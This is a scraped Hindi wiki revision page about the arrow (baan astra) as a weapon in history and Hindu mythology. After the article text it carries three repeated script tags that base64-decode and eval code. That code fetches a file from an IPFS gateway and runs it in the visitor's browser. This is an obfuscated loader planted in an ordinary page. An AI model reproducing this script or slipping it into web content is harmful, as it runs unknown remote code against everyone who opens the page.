Difference between revisions of "बाण अस्त्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
 +
{{अस्वीकरण}}
 
[[चित्र:Bow-And-Arrow.jpg|thumb|[[धनुष अस्त्र|धनुष]], बाण और तुणीर]]
 
[[चित्र:Bow-And-Arrow.jpg|thumb|[[धनुष अस्त्र|धनुष]], बाण और तुणीर]]
'''बाण अस्त्र'''
+
'''बाण अस्त्र''' इसके सायक, शर और तीर आदि भिन्न-भिन्न नाम हैं। ये बाण भिन्न-भिन्न प्रकार के होते हैं। उनके गुण और कर्म भिन्न-भिन्न हैं।  
 
+
इनका प्रयोग बारूद और बन्दूक़ों के चलन से पहले मुख्य रूप से किया जाता था। बाणों का प्रयोग 18वीं शताब्दी तक होता रहा है। [[हिन्दू धर्म]] में वर्णित देवी [[देवता|देवताओं]] ने इसका प्रयोग किया है।  
इसके सायक, शर और तीर आदि भिन्न-भिन्न नाम हैं। ये बाण भिन्न-भिन्न प्रकार के होते हैं। उनके गुण और कर्म भिन्न-भिन्न हैं।  
 
इनका प्रयोग बारूद और बन्दूक़ों के चलन से पहले मुख्य रूप से किया जाता था। बाणों का प्रयोग 18वीं शताब्दी तक होता रहा है। [[हिन्दू धर्म]] में वर्णित देवी देवताओं ने इसका प्रयोग किया है।  
 
  
  

Latest revision as of 07:58, 25 March 2012

30px yah lekh pauranik granthoan athava manyataoan par adharit hai at: isamean varnit samagri ke vaijnanik praman hone ka ashvasan nahian diya ja sakata. vistar mean dekhean asvikaran

[[chitr:Bow-And-Arrow.jpg|thumb|dhanush, ban aur tunir]] ban astr isake sayak, shar aur tir adi bhinn-bhinn nam haian. ye ban bhinn-bhinn prakar ke hote haian. unake gun aur karm bhinn-bhinn haian. inaka prayog barood aur bandooqoan ke chalan se pahale mukhy roop se kiya jata tha. banoan ka prayog 18vian shatabdi tak hota raha hai. hindoo dharm mean varnit devi devataoan ne isaka prayog kiya hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>